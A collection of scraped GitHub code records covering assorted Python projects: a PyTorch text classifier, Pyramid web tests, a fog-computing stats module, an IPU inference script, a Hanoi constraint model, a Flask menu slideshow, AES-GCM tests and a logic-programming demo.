torch.nn.NLLLoss()\n for batchIndex in range(int(data_size / batch_size)):\n optimizer.zero_grad()\n batch_loss= 0.0\n counts = 0\n for step in range(batchIndex * batch_size, min((batchIndex + 1) * batch_size, data_size)):\n input, real_out = generate_one_sample(sent_label=data_train[step],w2id=w2id)\n if torch.cuda.is_available():\n input=input.cuda()\n real_out=real_out.cuda()\n output, hidden = model(input)\n #\n print(output)\n print(real_out)\n batch_loss += criterion(output,real_out)\n #\n counts += 1\n #\n print(\"At epoch:{},batch:{}——>loss_avg:{}\".format({epoch_num}, {batchIndex},{batch_loss.data[0] / counts}))\n #\n batch_loss.backward()\n #\n optimizer.step()\n\ndef eval_after_one_epoch(model,data_val,w2id):\n '''\n 每一个epoch结束,进行一次eval!\n 分类效果评估!confusion matrix!\n '''\n result=[]#[[y_true,y_pred],[y_true,y_pred],...]\n loss=0.0\n data_size=len(data_val)\n criterion=torch.nn.NLLLoss()\n for step in range(len(data_val)):\n tmp=[]\n tmp.append(data_val[step][0])#y_true\n input, real_out = generate_one_sample(sent_label=data_val[step],w2id=w2id)\n if torch.cuda.is_available():\n input = input.cuda()\n real_out = real_out.cuda()\n output, hidden = model(input)\n #\n pred_y = torch.max(output,1)[1].data[0]\n #\n tmp.append(pred_y)\n result.append(tmp)\n #\n loss += criterion(output, real_out)\n #\n return loss / data_size,result\n\ndef confusion_matrix(result):\n '''\n 测试集分类效果展示:Confusion_Matrix!\n '''\n result=np.array(result)\n print(classification_report(y_true=result[:,0],y_pred=result[:,-1]))\n","repo_name":"CCL2019GIT/TextClassification","sub_path":"TextRNN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7252664376","text":"from typing import Dict\n\nfrom mage_ai.api.presenters.BasePresenter import BasePresenter\n\n\nclass ComputeConnectionPresenter(BasePresenter):\n default_attributes = [\n 'actions',\n 'attributes',\n 'connection',\n 'description',\n 'error',\n 'group',\n 'name',\n 'required',\n 
'state',\n 'status',\n 'status_calculated',\n 'steps',\n 'tab',\n 'target',\n 'uuid',\n ]\n\n async def prepare_present(self, **kwargs) -> Dict:\n return self.resource.model.to_dict()\n","repo_name":"omkar-foss/mage-ai","sub_path":"mage_ai/api/presenters/ComputeConnectionPresenter.py","file_name":"ComputeConnectionPresenter.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"32780987579","text":"\"\"\"Unit tests for all view functions.\"\"\"\n\nfrom __future__ import unicode_literals\nfrom pyramid.testing import DummyRequest\nimport pytest\nfrom pyramid import testing\nimport transaction\nfrom learning_journal.models import (\n Entry,\n get_tm_session,\n)\nfrom learning_journal.models.meta import Base\nfrom datetime import datetime\nfrom pyramid.httpexceptions import HTTPNotFound, HTTPFound, HTTPBadRequest\nfrom faker import Faker\nimport random\n\nFAKE = Faker()\n\n\n@pytest.fixture(scope='session')\ndef configuration(request):\n \"\"\"Config stuff for testing.\"\"\"\n config = testing.setUp(settings={\n 'sqlalchemy.url': 'postgres://localhost:5432/test-learning-journal'\n })\n config.include('learning_journal.models')\n\n def teardown():\n testing.tearDown()\n request.addfinalizer(teardown)\n return config\n\n\n@pytest.fixture\ndef db_session(configuration, request):\n \"\"\"Set up the db session for testing purposes.\"\"\"\n SessionFactory = configuration.registry[\"dbsession_factory\"]\n session = SessionFactory()\n engine = session.bind\n Base.metadata.create_all(engine)\n\n def teardown():\n session.transaction.rollback()\n Base.metadata.drop_all(engine)\n request.addfinalizer(teardown)\n return session\n\n\n@pytest.fixture\ndef dummy_req(db_session):\n \"\"\"Make a dummy GET request.\"\"\"\n return testing.DummyRequest(dbsession=db_session)\n\n\ndef test_list_view_returns_list_of_entries_in_dict(dummy_req):\n \"\"\"Test list view returns a list of all the entries as dicts.\"\"\"\n from learning_journal.views.default import list_view\n response = list_view(dummy_req)\n assert 'entries' in response\n assert isinstance(response['entries'], list)\n\n\ndef test_entry_exisits_and_is_in_list(dummy_req):\n \"\"\"Test that a dummy request creates a new entry.\"\"\"\n from learning_journal.views.default import list_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n dummy_req.dbsession.commit()\n response = list_view(dummy_req)\n assert new_entry.to_dict() in response['entries']\n\n\ndef test_detail_view_returns_details_of_entry_in_dict(dummy_req):\n \"\"\"Test detail view returns the details of one entry as dict.\"\"\"\n from learning_journal.views.default import detail_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n dummy_req.dbsession.commit()\n dummy_req.matchdict['id'] = 1\n response = detail_view(dummy_req)\n assert 'entry' in response\n assert isinstance(response['entry'], Entry)\n\n\ndef test_detail_view_raises_httpnotfound_for_invalid_id(dummy_req):\n \"\"\"Test detail view raises HTTPNotFound for invalid id.\"\"\"\n from learning_journal.views.default import detail_view\n dummy_req.matchdict['id'] = -1\n with pytest.raises(HTTPNotFound):\n detail_view(dummy_req)\n\n\ndef test_create_view_returns_empty_dict(dummy_req):\n \"\"\"Test create view returns 
an empty dict.\"\"\"\n from learning_journal.views.default import create_view\n response = create_view(dummy_req)\n assert not response\n assert isinstance(response, dict)\n\n\ndef test_update_view_returns_current_details_of_entry_in_dict(dummy_req):\n \"\"\"Test update view returns the current details of one entry as dict.\"\"\"\n from learning_journal.views.default import update_view\n from learning_journal.models import Entry\n new_entry = Entry(\n title='Title Here',\n body='This is a test of the body.'\n )\n dummy_req.dbsession.add(new_entry)\n dummy_req.dbsession.commit()\n dummy_req.matchdict['id'] = 1\n response = update_view(dummy_req)\n assert 'entry' in response\n assert isinstance(response['entry'], dict)\n\n\ndef test_update_view_raises_httpnotfound_for_invalid_id(dummy_req):\n \"\"\"Test update view raises HTTPNotFound for invalid id.\"\"\"\n from learning_journal.views.default import update_view\n dummy_req.matchdict['id'] = -1\n with pytest.raises(HTTPNotFound):\n update_view(dummy_req)\n\n\n@pytest.fixture(scope=\"session\")\ndef testapp(request):\n \"\"\"Create a copy of the WSGI app for testing purposes.\"\"\"\n from webtest import TestApp\n from pyramid.config import Configurator\n\n def main():\n config = Configurator()\n settings = {\n 'sqlalchemy.url': 'postgres://localhost:5432/test-learning-journal'\n }\n config = Configurator(settings=settings)\n config.include('pyramid_jinja2')\n config.include('.routes')\n config.include('.models')\n config.scan()\n return config.make_wsgi_app()\n\n app = main()\n\n SessionFactory = app.registry[\"dbsession_factory\"]\n engine = SessionFactory().bind\n Base.metadata.create_all(bind=engine)\n\n def tearDown():\n Base.metadata.drop_all(bind=engine)\n\n request.addfinalizer(tearDown)\n\n return TestApp(app)\n\n\n@pytest.fixture(scope=\"session\")\ndef fill_the_db(testapp):\n SessionFactory = testapp.app.registry[\"dbsession_factory\"]\n with transaction.manager:\n dbsession = get_tm_session(SessionFactory, transaction.manager)\n dbsession.add_all(ENTRIES)\n\nENTRIES = []\nfor i in range(20):\n new_entry = Entry(\n title='title #{}'.format(i),\n body=random.random() * 1000, \n creation_date=FAKE.date_time()\n )\n ENTRIES.append(new_entry)\n\n\ndef test_home_route_has_all_entries(testapp, fill_the_db):\n \"\"\"Test that the page on the home route has all journal entries.\"\"\"\n response = testapp.get('/')\n assert len(ENTRIES) == len(response.html.find_all('hr')) - 1\n\n\ndef test_create_route_has_empty_form(testapp):\n \"\"\"Test that the page on the create route has empty form.\"\"\"\n response = testapp.get('/journal/new-entry')\n assert 1 == len(response.html.find_all('form'))\n assert 0 == len(response.html.find_all(value='value'))\n\n\n# def test_create_adds_new_entry_to_list(testapp):\n# \"\"\"Test that create function adds a new entry properly.\"\"\"\n# response = testapp.get('/journal/new-entry')\n# assert 1 == len(response.html.find_all('form'))\n# assert 0 == len(response.html.find_all(value='value'))\n\n\ndef test_detail_route_has_one_entry(testapp):\n \"\"\"Test that the page on the detail route has one journal entry.\"\"\"\n response = testapp.get('/journal/1')\n assert 1 == len(response.html.find_all('h2'))\n assert 'title #0' in str(response.html.find('h2'))\n\n\ndef test_update_route_has_filled_form(testapp):\n \"\"\"Test that the page on the update route has filled form.\"\"\"\n response = testapp.get('/journal/1/edit-entry')\n assert 1 == len(response.html.find_all('form'))\n assert 'title #0' in 
str(response.html.find('input'))\n\n\n# def test_update_does_update_an_existing_entry(testapp):\n# \"\"\"Test that the update function correctly updates the original.\"\"\"\n# response = testapp.get('/journal/1/edit-entry')\n# assert 1 == len(response.html.find_all('form'))\n# assert '","repo_name":"mshinners/pyramid-learning-journal","sub_path":"learning_journal/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8652430091","text":"import pandas as pd\nimport numpy as np\n\nfrom yafs.metrics import Metrics\n\n\nclass Stats:\n\n def __init__(self,defaultPath=\"result\"):\n self.df_link = pd.read_csv(defaultPath + \"_link.csv\")\n self.df = pd.read_csv(defaultPath + \".csv\")\n\n\n def bytes_transmitted(self):\n return self.df_link[\"size\"].sum()\n\n def count_messages(self):\n return len(self.df_link)\n\n\n def utilization(self,id_entity, total_time, from_time=0.0):\n if \"time_service\" not in self.df.columns: #cached\n self.df[\"time_service\"] = self.df.time_out - self.df.time_in\n values = self.df.groupby(\"DES.dst\").time_service.agg(\"sum\")\n return values[id_entity] / total_time\n\n def compute_times_df(self):\n self.df[\"time_latency\"] = self.df[\"time_reception\"] - self.df[\"time_emit\"]\n self.df[\"time_wait\"] = self.df[\"time_in\"] - self.df[\"time_reception\"] #\n self.df[\"time_service\"] = self.df[\"time_out\"] - self.df[\"time_in\"]\n self.df[\"time_response\"] = self.df[\"time_out\"] - self.df[\"time_reception\"]\n self.df[\"time_total_response\"] = self.df[\"time_response\"] + self.df[\"time_latency\"]\n\n def times(self,time,value=\"mean\"):\n if \"time_response\" not in self.df.columns:\n self.compute_times_df()\n return self.df.groupby(\"message\").agg({time:value})\n\n\n\n def average_loop_response(self,time_loops):\n \"\"\"\n No hay chequeo de la existencia del loop: user responsability\n \"\"\"\n if \"time_response\" not in self.df.columns:\n self.compute_times_df()\n\n resp_msg = self.df.groupby(\"message\").agg({\"time_total_response\": [\"mean\",\"count\"]}) #Its not necessary to have \"count\"\n resp_msg.columns = ['_'.join(col).strip() for col in resp_msg.columns.values]\n results = []\n\n for loop in time_loops:\n total = 0.0\n for msg in loop:\n try:\n total += resp_msg[resp_msg.index == msg].time_total_response_mean[0]\n except IndexError:\n total +=0\n\n results.append(total)\n\n return results\n\n def get_watt(self,totaltime,topology,by=Metrics.WATT_SERVICE):\n results = {}\n nodeInfo = topology.get_info()\n if by == Metrics.WATT_SERVICE:\n # Tiempo de actividad / runeo\n if \"time_response\" not in self.df.columns: # cached\n self.compute_times_df()\n\n nodes = self.df.groupby(\"TOPO.dst\").agg({\"time_service\": \"sum\"})\n for id_node in nodes.index:\n results[id_node] = {\"model\": nodeInfo[id_node][\"model\"], \"type\": nodeInfo[id_node][\"type\"],\n \"watt\": nodes.loc[id_node].time_service * nodeInfo[id_node][\"WATT\"]}\n else:\n for node_key in nodeInfo:\n if not nodeInfo[node_key][\"uptime\"][1]:\n end = totaltime\n start = nodeInfo[node_key][\"uptime\"][0]\n uptime = end-start\n results[node_key] = {\"model\":nodeInfo[node_key][\"model\"],\"type\":nodeInfo[node_key][\"type\"],\"watt\":uptime*nodeInfo[node_key][\"WATT\"],\"uptime\":uptime}\n\n return results\n\n # def get_cost_cloud(self, topology):\n # cost = 0.0\n # nodeInfo = topology.get_info()\n # results = {}\n # # Tiempo de actividad / runeo\n # if 
\"time_response\" not in self.df.columns: # cached\n # self.__compute_times_df()\n #\n # nodes = self.df.groupby(\"TOPO.dst\").agg({\"time_service\": \"sum\"})\n #\n # for id_node in nodes.index:\n # if nodeInfo[id_node][\"type\"] == Entity.ENTITY_CLOUD:\n # results[id_node] = {\"model\": nodeInfo[id_node][\"model\"], \"type\": nodeInfo[id_node][\"type\"],\n # \"watt\": nodes.loc[id_node].time_service * nodeInfo[id_node][\"WATT\"]}\n # cost += nodes.loc[id_node].time_service * nodeInfo[id_node][\"COST\"]\n # return cost,results\n\n def showLoops(self,time_loops):\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n return results\n\n\n\n\n def showResults(self, total_time, topology, time_loops=None):\n print (\"\\tSimulation Time: %0.2f\" % total_time)\n\n if time_loops is not None:\n print (\"\\tApplication loops delays:\")\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n\n print (\"\\tEnergy Consumed (WATTS by UpTime):\")\n values = self.get_watt(total_time, topology, Metrics.WATT_UPTIME)\n for node in values:\n print (\"\\t\\t%i - %s :\\t %.2f\" % (node, values[node][\"model\"], values[node][\"watt\"]))\n\n print (\"\\tEnergy Consumed by Service (WATTS by Service Time):\")\n values = self.get_watt(total_time, topology, Metrics.WATT_SERVICE)\n for node in values:\n print (\"\\t\\t%i - %s :\\t %.2f\" % (node, values[node][\"model\"], values[node][\"watt\"]))\n\n print (\"\\tCost of execution in cloud:\")\n total, values = self.get_cost_cloud(topology)\n print (\"\\t\\t%.8f\" % total)\n\n print (\"\\tNetwork bytes transmitted:\")\n print (\"\\t\\t%.1f\" % self.bytes_transmitted())\n\n\n def showResults2(self, total_time, time_loops=None):\n print (\"\\tSimulation Time: %0.2f\" % total_time)\n\n if time_loops is not None:\n print (\"\\tApplication loops delays:\")\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n\n print (\"\\tNetwork bytes transmitted:\")\n print (\"\\t\\t%.1f\" % self.bytes_transmitted())\n\n \"\"\"ONLYE THE FIRST ONE : DEBUG\"\"\"\n def valueLoop(self, total_time, time_loops=None):\n if time_loops is not None:\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n return results[i]\n\n def average_messages_not_transmitted(self):\n return np.mean(self.df_link.buffer)\n\n def peak_messages_not_transmitted(self):\n return np.max(self.df_link.buffer)\n\n def messages_not_transmitted(self):\n return self.df_link.buffer[-1:]\n\n def get_df_modules(self):\n g = self.df.groupby([\"module\", \"DES.dst\"]).agg({\"service\": ['mean', 'sum', 'count']})\n return g.reset_index()\n\n def get_df_service_utilization(self,service,time):\n \"\"\"\n Returns the utilization(%) of a specific module\n \"\"\"\n g = self.df.groupby([\"module\", \"DES.dst\"]).agg({\"service\": ['mean', 'sum', 'count']})\n g.reset_index(inplace=True)\n h = pd.DataFrame()\n h[\"module\"] = g[g.module == service].module\n h[\"utilization\"] = g[g.module == service][\"service\"][\"sum\"]*100 / time\n return h\n\n\n","repo_name":"acsicuib/YAFS","sub_path":"src/yafs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} 
+{"seq_id":"11201708054","text":"#!/usr/bin/env python\n\"\"\" \nread trained net : model+weights\nread test data from HD5\ninfere for test data \n\nInference works alwasy on 1 IPU\n./predict_one.py -m outY -X\n\n\"\"\"\n\n__author__ = \"Jan Balewski\"\n__email__ = \"janstar1122@gmail.com\"\n\nimport numpy as np\nimport torch\n\nimport time\nimport sys,os\nimport logging\n\nfrom toolbox.Model import MyModelWithLoss\nfrom toolbox.Util_IOfunc import read_yaml, write_yaml, restore_checkpoint\n\nfrom toolbox.Dataloader_h5 import get_data_loader\n\nimport poptorch\nimport popdist.poptorch\n\nsys.path.append(os.path.relpath(\"../torch/toolbox/\"))\nfrom Plotter import Plotter_NeuronInverter\nimport argparse\n\n#...!...!..................\ndef get_parser():\n parser = argparse.ArgumentParser()\n #parser.add_argument(\"--facility\", default='corigpu', type=str)\n parser.add_argument('--venue', dest='formatVenue', choices=['prod','poster'], default='prod',help=\" output quality/arangement\")\n\n parser.add_argument(\"-m\",\"--modelPath\", default='out/', help=\"trained model \")\n parser.add_argument(\"-o\", \"--outPath\", default='same',help=\"output path for plots and tables\")\n \n parser.add_argument( \"-X\",\"--noXterm\", dest='noXterm', action='store_true', default=False, help=\"disable X-term for batch mode\")\n\n parser.add_argument(\"-n\", \"--numSamples\", type=int, default=None, help=\"limit samples to predict\")\n parser.add_argument(\"-v\",\"--verbosity\",type=int,choices=[0, 1, 2], help=\"increase output verbosity\", default=1, dest='verb')\n\n parser.add_argument(\"--cellName\", type=str, default=None, help=\"alternative cell shortName \")\n args = parser.parse_args()\n args.prjName='neurInfer'\n\n for arg in vars(args): print( 'myArg:',arg, getattr(args, arg))\n return args\n\n#...!...!..................\ndef load_model4infer(sumMD,modelPath):\n # ... 
assemble model\n\n device = torch.device(\"cuda\")\n # load entirel model\n modelF = os.path.join(modelPath, sumMD['train_params']['blank_model'])\n stateF= os.path.join(modelPath, sumMD['train_params']['checkpoint_name'])\n\n print('M: load model:',modelF)\n myModel = torch.load(modelF)\n modelWloss=MyModelWithLoss(myModel)\n print('M: tmp popOpt re-init')\n popOpts = popdist.poptorch.Options()\n popOpts.deviceIterations(1)\n cachePath='./exec_cache'\n popOpts.enableExecutableCaching(cachePath)\n \n print(\"\\n----------- restore model for inference, state= \",stateF)\n startEpoch=restore_checkpoint( stateF, modelWloss)\n\n model4infer = poptorch.inferenceModel(modelWloss.eval(), options=popOpts)\n return model4infer,popOpts\n\n#...!...!..................\ndef model_infer(model,test_loader,sumMD):\n\n criterion =torch.nn.MSELoss() # Mean Squared Loss\n test_loss = 0\n\n # prepare output container, Thorsten's idea\n num_samp=len(test_loader.dataset)\n outputSize=sumMD['train_params']['model']['outputSize']\n print('predict for num_samp=',num_samp,', outputSize=',outputSize)\n # clever list-->numpy conversion, Thorsten's idea\n Uall=np.zeros([num_samp,outputSize],dtype=np.float32)\n Zall=np.zeros([num_samp,outputSize],dtype=np.float32)\n nEve=0\n nStep=0\n cpuLossF=torch.nn.MSELoss(reduction='none' )#returns a loss per element\n \n for j,(data, target) in enumerate(test_loader):\n pred, loss_op = model4infer(data, target)\n loss=np.mean(loss_op.numpy())\n print(j,'=j, type: target=',type(target),target.shape,'pred',type(pred),pred.shape)\n \n cpuLoss2D=cpuLossF(pred,target).numpy()\n #print(j,'=j, type: cpuLoss2D=',type(cpuLoss2D),cpuLoss2D.shape)\n cpuLossV=np.mean(cpuLoss2D,axis=1)\n #print(j,'=j, type: cpuLossV=',type(cpuLossV),cpuLossV.shape)\n cpuLoss=np.mean(cpuLossV)\n \n print('pred j=%d ipuLoss=%.4f, cpuLoss=%.4f Shapes: pred=%s, loss=%s, cpuLossV=%s'%(j,loss,cpuLoss,str(pred.shape),str(loss.shape),str(cpuLossV.shape)))\n '''\n data_dev, target_dev = data.to(device), target.to(device)\n output_dev = model(data_dev)\n lossOp=criterion(output_dev, target_dev)\n print('qq',lossOp,len(test_loader.dataset),len(test_loader)); ok55\n \n output=output_dev.cpu()\n '''\n test_loss += loss\n nEve2=nEve+target.shape[0]\n print('nn',nEve,nEve2)\n Uall[nEve:nEve2,:]=target[:]\n Zall[nEve:nEve2,:]=pred[:]\n nEve=nEve2\n nStep+=1\n test_loss /= nStep\n print('infere done, nEve=%d nStep=%d loss=%.4f'%(nEve,nStep,test_loss))\n return test_loss,Uall,Zall\n\n \n#=================================\n#=================================\n# M A I N \n#=================================\n#=================================\nif __name__ == '__main__':\n args=get_parser()\n logging.basicConfig(format='%(levelname)s - %(message)s', level=logging.INFO)\n\n if args.outPath=='same' : args.outPath=args.modelPath\n sumF=args.modelPath+'/sum_train.yaml'\n sumMD = read_yaml( sumF)\n parMD=sumMD['train_params']\n inpMD=sumMD['input_meta']\n \n model4infer,popOpts=load_model4infer(sumMD,args.modelPath)\n #1print(model)\n\n if args.cellName!=None:\n parMD['cell_name']=args.cellName\n\n if args.numSamples!=None:\n parMD['max_samples_per_epoch' ] = args.numSamples\n domain='test'\n parMD['world_size']=1\n\n data_loader = get_data_loader(parMD, inpMD,domain, popOpts, verb=args.verb)\n\n startT=time.time()\n loss,U,Z=model_infer(model4infer,data_loader,sumMD)\n predTime=time.time()-startT\n print('M: infer : Average loss: %.4f events=%d , elaT=%.2f min\\n'% (loss, Z.shape[0],predTime/60.))\n\n sumRec={}\n 
sumRec['domain']=domain\n sumRec[domain+'LossMSE']=float(loss)\n sumRec['predTime']=predTime\n sumRec['numSamples']=U.shape[0]\n sumRec['lossThrHi']=0.50 # for tagging plots\n sumRec['inpShape']=sumMD['train_params']['model']['inputShape']\n sumRec['short_name']=sumMD['train_params']['cell_name']\n sumRec['modelDesign']=sumMD['train_params']['model']['myId']\n sumRec['trainRanks']=sumMD['train_params']['world_size']\n sumRec['trainTime']=sumMD['trainTime_sec']\n sumRec['loss_valid']= sumMD['loss_valid']\n\n #\n # - - - - only plotting code is below - - - - -\n \n plot=Plotter_NeuronInverter(args,inpMD ,sumRec )\n\n plot.param_residua2D(U,Z)\n\n write_yaml(sumRec, args.outPath+'/sum_pred.yaml')\n\n #1plot.params1D(U,'true U',figId=7)\n plot.params1D(Z,'pred Z',figId=8)\n\n if 0: \n print('input data example, it will plot waveforms')\n dlit=iter(data_loader)\n xx, yy = next(dlit)\n #1xx, yy = next(dlit) #another sample\n print('batch, X,Y;',xx.shape,xx.dtype,yy.shape,yy.dtype)\n print('Y[:2]',yy[:2])\n plot.frames_vsTime(xx,yy,9)\n \n \n plot.display_all('predict') \n\n","repo_name":"balewski/neuron_inverter_benchmark","sub_path":"poptorch_jan/predict_one.py","file_name":"predict_one.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"813127239","text":"from pycsp3 import *\nfrom pycsp3.tools.utilities import value_in_base\n\nnDisks = data\nnTowers = 3\nnStates, nSteps = nTowers ** nDisks, 2 ** nDisks - 1\n\nx = VarArray(size=nSteps - 1, dom=range(nStates))\n\n\ndef table():\n def are_compatible(state1, state2):\n t1, t2 = value_in_base(state1, nDisks, nTowers), value_in_base(state2, nDisks, nTowers)\n frozen_towers = [False] * nTowers\n for i in range(len(t1) - 1, -1, -1):\n if t1[i] != t2[i]:\n break\n frozen_towers[t1[i]] = True\n return i >= 0 and not frozen_towers[t1[i]] and not frozen_towers[t2[i]] and all(t1[j] == t2[j] for j in range(i))\n\n return {(i, j) for i in range(nStates) for j in range(nStates) if are_compatible(i, j)}\n\n\ntable = table()\n\nsatisfy(\n x[0] in {1, 2},\n\n [(x[i], x[i + 1]) in table for i in range(nSteps - 2)]\n)\n","repo_name":"Jerryyuanyuan/RB_MIX","sub_path":"problems/g5_special/Hanoi.py","file_name":"Hanoi.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"451241413","text":"from flask import Flask, Response, render_template\nimport os\nimport time\nimport json\nimport datetime\nimport glob\n\napp = Flask(__name__, template_folder='template')\n\n#picture_path = os.environ.get('picture_path')\npicture_path = \"/var/infoscreen-munic/pictures\"\n\nrestaurant_counter = 0\nrestaurants = [['Mensa Arcistraße', 'response_mensa-arcisstr.json'], ['Mensa Garching','response_mensa-garching.json'], ['Mensa Leopoldstraße', 'response_mensa-leopoldstr.json'], ['Mensa Lothstraße', 'response_mensa-lothstr.json']]\nNOT_INTRESTING_FOOD = [\"Reis\", \"Tagessuppe\", \"Täglich frische Dessertbar\", \"Täglich frische Salatbar\", \"Saisonale Beilagensalate\"]\n\ndef get_mensa_data(number):\n dishes = []\n with open(\"./MENUs/\" + restaurants[number][1], 'r') as f:\n data = json.load(f)\n weekday = datetime.datetime.now().weekday()\n print(weekday)\n for dish in data['days'][weekday]['dishes'][:][:][:]:\n dishes.append(dish['name'])\n\n # Remove stupid stuff\n dishes[:] = [item for item in dishes if item not in NOT_INTRESTING_FOOD]\n \n return dishes\n\n\ndef gen():\n i = 
0\n\n while True:\n time.sleep(5)\n images = get_all_images()\n image_name = images[i]\n im = open(picture_path + image_name, 'rb').read()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + im + b'\\r\\n')\n i += 1\n if i >= len(images):\n i = 0\n\n\ndef get_all_images():\n images = [img for img in os.listdir(picture_path)\n if img.endswith(\".jpg\") or\n img.endswith(\".jpeg\") or\n img.endswith(\"png\")]\n return images\n\n\n@app.route('/slideshow')\ndef slideshow():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/update_menu')\ndef update_menu():\n global restaurant_counter\n updated_list = get_mensa_data(restaurant_counter)\n print(update_menu)\n list_name = restaurants[restaurant_counter][0]\n if restaurant_counter < len(restaurants)-1:\n restaurant_counter = restaurant_counter +1\n else:\n restaurant_counter = 0\n return render_template('menus.html', list_name=list_name, items=updated_list)\n\n\n# dishes = get_mensa_data(0)\n# mensa_name = restaurants[0][0]\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n ","repo_name":"flogriesser/infoscreen-munich","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42847400742","text":"#La setencia For \n\"\"\"Python permite recorrer aquellos tipos de datos que sean iterables, es decir, que admitan iterar 2 sobre ellos. \nAlgunos ejemplos de tipos y estructuras de datos que permiten ser iteradas (recorridas) \nson: cadenas de texto, listas, diccionarios, ficheros, etc. La sentencia for nos permite realizar esta acción.\"\"\"\n#La sintaxis de un bucle for es la siguiente:\n\"\"\"\nfor variable in elemento iterable (lista, cadena, range, etc.):\n cuerpo del bucle\n\"\"\"\n\nword = 'Python_es_lo_mejor'\n\nfor letter in word: \n print(letter, end='')\n\n# Python for y la clase range\nfor i in range(11):\n print(i)","repo_name":"luismarquez21/practicas_python","sub_path":"Aprende_python/py006.py","file_name":"py006.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41309985087","text":"\"\"\"Test the aes_gcm utilities.\"\"\"\n\nfrom cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\nfrom .aes_gcm import aes_gcm_encrypt\nfrom .aes_gcm import aes_gcm_decrypt\n\n\ndef test_aes_gcm_mode():\n \"\"\"Test encrypt/decrypt.\"\"\"\n expected = b\"This message is the expected message.\"\n print(expected)\n key = AESGCM.generate_key(bit_length=128)\n print(key)\n (ciphertext, iv) = aes_gcm_encrypt(expected, key)\n print(ciphertext)\n print(iv)\n actual = aes_gcm_decrypt(ciphertext, key, iv)\n print(actual)\n assert actual == expected\n","repo_name":"opentdf/backend","sub_path":"containers/kas/kas_core/tdf3_kas_core/util/cipher/aes_gcm_test.py","file_name":"aes_gcm_test.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"7454126592","text":"from pprint import pprint\n\nfrom pryo import scm\nfrom pryo import KBMan\n\nk = KBMan()\n\n# Facts\nk.father['John', 'Lucy']\nk.father['John', 'Lucas']\nk.mother['Sarah', 'Lucy']\nk.mother['Sarah', 'Lucas']\nk.father['Gregor', 'John']\n\n# Schematic variables for first-order universal quantification\nx, y, z, w = 
scm('xyzw')\n\n# Declaring a rule\n# - Using brackets for the LHS predicate, roughly meaning:\n# + \"making a new indexed predicate\"\n# - Using parenthesis for each RHS predicate, roughly meaning:\n# + \"calling for unification\"\nk.sibling[x, y] = [\n k.father(z, x),\n k.father(z, y),\n x != y # overloaded operation on schematic variables\n]\n\n# Definition for alternatives\nk.parent[x, y] = k.father(x, y)\nk.parent[x, y] = k.mother(x, y)\n\n# Recursive rules\nk.ancester[x, y] = k.father(x, y)\nk.ancester[x, y] = [k.father(x, z), k.ancester(z, y)]\n\n# Can inspect the knowledge-base status\npprint(k.kb)\n# [father/2['John', 'Lucy'],\n# father/2['John', 'Lucas'],\n# father/2['Gregor', 'John'],\n# mother/2['Sarah', 'Lucy'],\n# mother/2['Sarah', 'Lucas'],\n# (sibling/2[x, y] :- father/2[z, x] & father/2[z, y] & (x != y).),\n# (parent/2[x, y] :- father/2[x, y].),\n# (parent/2[x, y] :- mother/2[x, y].),\n# (ancester/2[x, y] :- father/2[x, y].),\n# (ancester/2[x, y] :- father/2[x, z] & ancester/2[z, y].)]\n\n# The query proxy provides by `KBMan`\nq = k.query\n\n# Optionally using Var object for queries\nfrom pryo import Var\n\n# Do a query with q, with two variable arguments, each variable can be either\n# - explicitly constructed: Var('name')\n# - a string starting with '$': '$name'\nr = q.sibling(Var('who1'), '$who2')\n# Query results are iteratively generated\nprint(next(r))\n# {$who2: 'Lucas', $who1: 'Lucy'}\nprint(next(r))\n# {$who2: 'Lucy', $who1: 'Lucas'}\ntry:\n print(next(r))\nexcept StopIteration:\n print('Query exhausted.')\n\nr = q.parent(\"$lucy's parent\", 'Lucy')\nprint(list(r))\n# [{$lucy's parent: 'John'}, {$lucy's parent: 'Sarah'}]\n\n\n# Query a variable relevant to a constant 'Lucy'\nres = q.ancester('$ancester', '$decedant')\npprint(list(res))\n# [{$ancester: 'John', $decedant: 'Lucy'},\n# {$ancester: 'John', $decedant: 'Lucas'},\n# {$ancester: 'Gregor', $decedant: 'John'},\n# {$ancester: 'Gregor', $decedant: 'Lucy'},\n# {$ancester: 'Gregor', $decedant: 'Lucas'}]\n\n\nimport operator 